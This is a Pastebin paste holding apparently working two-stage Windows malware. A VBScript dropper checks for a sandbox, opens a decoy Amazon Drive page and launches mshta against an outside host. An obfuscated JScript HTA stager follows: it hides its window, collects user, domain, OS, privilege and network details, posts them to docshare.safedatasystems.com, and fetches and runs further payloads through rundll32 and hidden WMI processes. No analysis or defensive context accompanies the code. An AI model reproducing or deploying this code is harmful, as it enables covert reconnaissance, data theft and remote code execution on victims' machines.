Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- igggggnooooooor this line
- ///////// Stage 1 ///////////////////
- <script language="VBScript">
- Dim iURL
- iURL = "https://www.amazon.com/gp/drive"
- Set objShell = CreateObject("Wscript.Shell")
- strInfo = objShell.expandenvironmentstrings("%COMPUTERNAME%")
- strInfo2 = objShell.expandenvironmentstrings("%LOGONSERVER%")
- strInfo2 = replace(strInfo2, "\\", "")
- if strInfo2 = strInfo then
- msgbox ("error opening document")
- else
- objShell.run(iURL)
- objShell.Run "mshta https://docshare.safedatasystems.com:443/235gfd"
- Window.Close
- end if
- </script>
- ///////// Stage 2 //////////////////
- <html>
- <head>
- <script language="JScript">
- window.moveTo(-1337, -2019);
- window.blur();
- window.resizeTo(2, 4);
- try
- {
- window.onerror = function(sMsg, sUrl, sLine) { return false; }
- window.onfocus = function() { window.blur(); }
- }
- catch (e){}
- var QASIHKVVLB={};QASIHKVVLB.WUGSEFYMRD=new ActiveXObject("Scripting.FileSystemObject");QASIHKVVLB.UTINHUTENQ=new ActiveXObject("WScript.Shell");QASIHKVVLB.ZXNDGZZVJS="https://docshare.safedatasystems.com:443/235gfd";QASIHKVVLB.FVQIPGWMOE="19cc6085c4b24bfca38cac4b59dddd21";QASIHKVVLB.LLCZPIKBVW="";QASIHKVVLB.BBFFFMPAGP="https://docshare.safedatasystems.com:443/235gfd?V0GGVJNH4X=19cc6085c4b24bfca38cac4b59dddd21;GU1SYCFEL4=";QASIHKVVLB.UHZHKLSJIG="999999999999999";QASIHKVVLB.FPQBBTIMXD=function()
- {if(QASIHKVVLB.MMNCUJOVQX())
- {try{window.close();}catch(e){}
- try{window.self.close();}catch(e){}
- try{window.top.close();}catch(e){}
- try{self.close();}catch(e){}
- try
- {window.open('','_self','');window.close();}
- catch(e)
- {}}
- try
- {WScript.quit();}
- catch(e)
- {}
- try
- {var pid=QASIHKVVLB.CBOGFVBUDV.currentPID();QASIHKVVLB.CBOGFVBUDV.kill(pid);}
- catch(e)
- {}}
- QASIHKVVLB.MMNCUJOVQX=function()
- {return typeof(window)!=="undefined";}
- QASIHKVVLB.CGHMTFFONF=function()
- {try
- {function s4()
- {return Math.floor((1+Math.random())*0x10000).toString(16).substring(1);}
- return s4()+s4()+'-'+s4()+'-'+s4()+'-'+
- s4()+'-'+s4()+s4()+s4();}
- catch(e)
- {}}
- QASIHKVVLB.IADMFMQGLO={};QASIHKVVLB.IADMFMQGLO.XBLYTDPQTZ=function()
- {try
- {var res=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("(net session || echo unelevated)","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");if(res.indexOf("unelevated")==-1)
- {return true;}
- return false;}
- catch(e)
- {return false;}}
- QASIHKVVLB.IADMFMQGLO.SGPEAFIMUA=function()
- {try
- {var osver=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");var osbuild=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber");return osver+"***"+osbuild;}
- catch(e){}
- return"Unknown";}
- QASIHKVVLB.IADMFMQGLO.ZOIBSQLOBH=function()
- {try
- {var DC=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");if(DC.length>0)
- {return DC;}}
- catch(e)
- {}
- return"Unknown";}
- QASIHKVVLB.IADMFMQGLO.AKJGCYHLAT=function()
- {try
- {var arch=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE");return arch;}
- catch(e){}
- return"Unknown";}
- QASIHKVVLB.IADMFMQGLO.KCXQBFNYDY=function()
- {try
- {var cwd=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("cd","%TEMP%\\cwd.txt");return cwd;}
- catch(e)
- {}
- return"";}
- QASIHKVVLB.IADMFMQGLO.SBMJCKVJOL=function()
- {try
- {var routeprint4=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("route PRINT","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");var res=routeprint4.split("\r\n");for(var i=0;i<res.length;i++)
- {line=res[i].split(" ");zerocount=0;itemcount=0;correctflag=false;for(var j=0;j<line.length;j++)
- {if(line[j])
- {itemcount+=1;if(itemcount==4&&correctflag){return line[j];}}
- if(line[j]=="0.0.0.0")
- {zerocount+=1;if(zerocount==2)
- {correctflag=true;}}}}}
- catch(e)
- {}
- return"";}
- QASIHKVVLB.IADMFMQGLO.QDLXGHIFXT=function()
- {var net=new ActiveXObject("WScript.Network");var domain="";if(net.UserDomain.length!=0)
- {domain=net.UserDomain;}
- else
- {domain=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("echo %userdomain%","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");domain=domain.split(" \r\n")[0];}
- var info=domain+"\\"+net.Username;if(QASIHKVVLB.IADMFMQGLO.XBLYTDPQTZ())
- info+="*";info+="~~~"+net.ComputerName;info+="~~~"+QASIHKVVLB.IADMFMQGLO.SGPEAFIMUA();info+="~~~"+QASIHKVVLB.IADMFMQGLO.ZOIBSQLOBH();info+="~~~"+QASIHKVVLB.IADMFMQGLO.AKJGCYHLAT();info+="~~~"+QASIHKVVLB.IADMFMQGLO.KCXQBFNYDY();info+="~~~"+QASIHKVVLB.IADMFMQGLO.SBMJCKVJOL();info+="~~~"+QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ();info+="~~~"+QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS();return info;}
- QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ=function()
- {try
- {var encoder=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Nls\\CodePage\\ACP");return encoder;}
- catch(e)
- {return"1252";}}
- QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS=function()
- {try
- {var encoder=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Nls\\CodePage\\OEMCP");return encoder;}
- catch(e)
- {return"437";}}
- QASIHKVVLB.CIAKFFSIIC={};QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT=function(data,headers)
- {return QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH(QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM(),data,headers);}
- QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP=function(e)
- {try
- {var headers={};headers["errno"]=(e.number)?e.number:"-1";headers["errname"]=(e.name)?e.name:"Unknown";headers["errdesc"]=(e.description)?e.description:"Unknown";return QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT(e.message,headers);}
- catch(e)
- {}}
- QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM=function(jobkey)
- {var jobkey=(typeof(jobkey)!=="undefined")?jobkey:QASIHKVVLB.LLCZPIKBVW;return QASIHKVVLB.BBFFFMPAGP+jobkey+";";}
- QASIHKVVLB.CIAKFFSIIC.OCPMLNCMGJ=function()
- {var url=QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM();return QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH(url);}
- QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA=function(jobkey,fork32Bit)
- {var fork32Bit=(typeof(fork32Bit)!=="undefined")?fork32Bit:false;var cmd="rundll32.exe ***K***\\..\\..\\..\\mshtml,RunHTMLApplication";if(fork32Bit)
- cmd=QASIHKVVLB.PEJMFGFUTF.PQYGQIDAVF()+cmd;cmd=cmd.replace("***K***",QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM(jobkey));try{QASIHKVVLB.KENMUZPXQD.KMXUAIQNDC(cmd);}catch(e){QASIHKVVLB.UTINHUTENQ.Run(cmd,0,false);}}
- QASIHKVVLB.SDQYWFAOVF={};QASIHKVVLB.SDQYWFAOVF.QWILYWEITP=function()
- {var http=null;try
- {http=new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");http.setTimeouts(0,0,0,0);}
- catch(e)
- {http=new ActiveXObject("WinHttp.WinHttpRequest.5.1");http.setTimeouts(30000,30000,30000,0)}
- return http;}
- QASIHKVVLB.SDQYWFAOVF.ACWUEMNQCB=function(http,headers)
- {var headers=(typeof(headers)!=="undefined")?headers:{};var content=false;for(var key in headers)
- {var value=headers[key];http.setRequestHeader(key,value);if(key.toUpperCase()=="CONTENT-TYPE")
- content=true;}
- if(!content)
- http.setRequestHeader("Content-Type","application/octet-stream");http.setRequestHeader("encoder",QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ())}
- QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH=function(url,data,headers)
- {var data=(typeof(data)!=="undefined")?data:"";var http=QASIHKVVLB.SDQYWFAOVF.QWILYWEITP();http.open("POST",url,false);QASIHKVVLB.SDQYWFAOVF.ACWUEMNQCB(http,headers);http.send(data);return http;}
- QASIHKVVLB.CBOGFVBUDV={};QASIHKVVLB.KKDYFDJLDD={};QASIHKVVLB.KKDYFDJLDD.IKVTUEVQJX=0x80000000;QASIHKVVLB.KKDYFDJLDD.OKJQQPKLGL=0x80000001;QASIHKVVLB.KKDYFDJLDD.ZYPADGQWJG=0x80000002;QASIHKVVLB.KKDYFDJLDD.DMOKBPYDGJ=0;QASIHKVVLB.KKDYFDJLDD.HXGBIEUDMZ=1;QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT=2;QASIHKVVLB.KKDYFDJLDD.ZETVECMZFC=3;QASIHKVVLB.KKDYFDJLDD.FXIKUDSPEW=function(computer)
- {var computer=(typeof(computer)!=="undefined")?computer:".";var reg=GetObject("winmgmts:\\\\"+computer+"\\root\\default:StdRegProv");return reg;}
- QASIHKVVLB.KKDYFDJLDD.LXYBKWSROH=function(hKey,path,key,value,valType,computer)
- {var reg=QASIHKVVLB.KKDYFDJLDD.FXIKUDSPEW(computer);reg.CreateKey(hKey,path);if(valType==QASIHKVVLB.KKDYFDJLDD.DMOKBPYDGJ)
- reg.SetStringValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT)
- reg.SetDWORDValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.ZETVECMZFC)
- reg.SetQWORDValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.HXGBIEUDMZ)
- reg.SetBinaryValue(hKey,path,key,value);}
- QASIHKVVLB.KENMUZPXQD={};QASIHKVVLB.KENMUZPXQD.KMXUAIQNDC=function(cmd)
- {var SW_HIDE=0;var pid=0;var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")
- var si=wmi.Get("Win32_ProcessStartup").SpawnInstance_();si.ShowWindow=SW_HIDE;si.CreateFlags=16777216;si.X=si.Y=si.XSize=si.ySize=1;var w32proc=wmi.Get("Win32_Process");var method=w32proc.Methods_.Item("Create");var inParams=method.InParameters.SpawnInstance_();inParams.CommandLine=cmd;inParams.CurrentDirectory=null;inParams.ProcessStartupInformation=si;var outParams=w32proc.ExecMethod_("Create",inParams);return outParams.ProcessId;}
- QASIHKVVLB.RGTBMPDDFB={};QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD=function(cmd,stdOutPath)
- {cmd="chcp "+QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS()+" & "+cmd;var c="%comspec% /q /c "+cmd+" 1> "+QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(stdOutPath);c+=" 2>&1";QASIHKVVLB.UTINHUTENQ.Run(c,0,true);if(QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ()=="936")
- {var data=QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ(stdOutPath);}
- else
- {var data=QASIHKVVLB.PEJMFGFUTF.NBMHEMZVXN(stdOutPath);}
- QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW(stdOutPath);return data;}
- QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC=function(cmd,fork)
- {var fork=(typeof(fork)!=="undefined")?fork:true;var c="%comspec% /q /c "+cmd;QASIHKVVLB.UTINHUTENQ.Run(cmd,0,!fork);}
- QASIHKVVLB.PEJMFGFUTF={};QASIHKVVLB.PEJMFGFUTF.VYENALGHYK=function(path)
- {return QASIHKVVLB.UTINHUTENQ.ExpandEnvironmentStrings(path);}
- QASIHKVVLB.PEJMFGFUTF.PQYGQIDAVF=function()
- {var base=QASIHKVVLB.PEJMFGFUTF.VYENALGHYK("%WINDIR%");var syswow64=base+"\\SysWOW64\\";if(QASIHKVVLB.WUGSEFYMRD.FolderExists(syswow64))
- return syswow64;return base+"\\System32\\";}
- QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ=function(path)
- {var loopcount=0;while(true)
- {if(QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)).Size>0)
- {var fd=QASIHKVVLB.WUGSEFYMRD.OpenTextFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path),1,false,0);var data=fd.ReadAll();fd.Close();return data;}
- else
- {loopcount+=1;if(loopcount>180)
- {return"";}
- QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("ping 127.0.0.1 -n 2",false);}}}
- QASIHKVVLB.PEJMFGFUTF.NBMHEMZVXN=function(path,exists)
- {var exists=(typeof(exists)!=="undefined")?exists:false;if(!QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&exists)
- {var headers={};headers["Status"]="NotExist";QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT("",headers);return"";}
- var loopcount=0;while(true)
- {if(QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)).Size>0)
- {if(QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ()=="936")
- {var newout="%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt";QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("whoami");QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("certutil -encode "+QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)+" "+newout);var data=QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ(newout);QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW(newout);}
- else
- {var fp=QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path));var fd=fp.OpenAsTextStream();var data=fd.read(fp.Size);fd.close();}
- return data;}
- else
- {loopcount+=1;if(loopcount>180)
- {return"";}
- QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("ping 127.0.0.1 -n 2",false);}}}
- QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW=function(path)
- {QASIHKVVLB.WUGSEFYMRD.DeleteFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path),true);};try
- {if(QASIHKVVLB.LLCZPIKBVW!="stage")
- {if(QASIHKVVLB.MMNCUJOVQX())
- {var path="SOFTWARE\\Microsoft\\Internet Explorer\\Styles";var key="MaxScriptStatements";QASIHKVVLB.KKDYFDJLDD.LXYBKWSROH(QASIHKVVLB.KKDYFDJLDD.OKJQQPKLGL,path,key,0xFFFFFFFF,QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT);}
- QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT(QASIHKVVLB.IADMFMQGLO.QDLXGHIFXT());try{QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA("");}catch(e){QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP(e)}
- QASIHKVVLB.FPQBBTIMXD();}
- else
- {if(QASIHKVVLB.MMNCUJOVQX())
- DoWorkTimeout();else
- DoWorkLoop();}}
- catch(e)
- {QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP(e);}
- function DoWork()
- {var epoch=new Date().getTime();var expire=parseInt(QASIHKVVLB.UHZHKLSJIG);if(epoch>expire)
- {return false;}
- try
- {var work=QASIHKVVLB.CIAKFFSIIC.OCPMLNCMGJ();if(work.status==201||work.status==202)
- {if(work.responseText.length>0){var jobkey=work.responseText;QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA(jobkey,work.status==202);}}
- else
- {return false;}}
- catch(e)
- {return false;}
- return true;}
- function DoWorkLoop()
- {while(DoWork());QASIHKVVLB.FPQBBTIMXD();}
- function DoWorkTimeout()
- {for(var i=0;i<10;++i)
- {if(!DoWork())
- {QASIHKVVLB.FPQBBTIMXD();return;}}
- QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA("");QASIHKVVLB.FPQBBTIMXD();}
- </script>
- <hta:application caption="no" windowState="minimize" showInTaskBar="no"
- scroll="no" navigable="no" />
- <!-- -->
- </head>
- <body>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement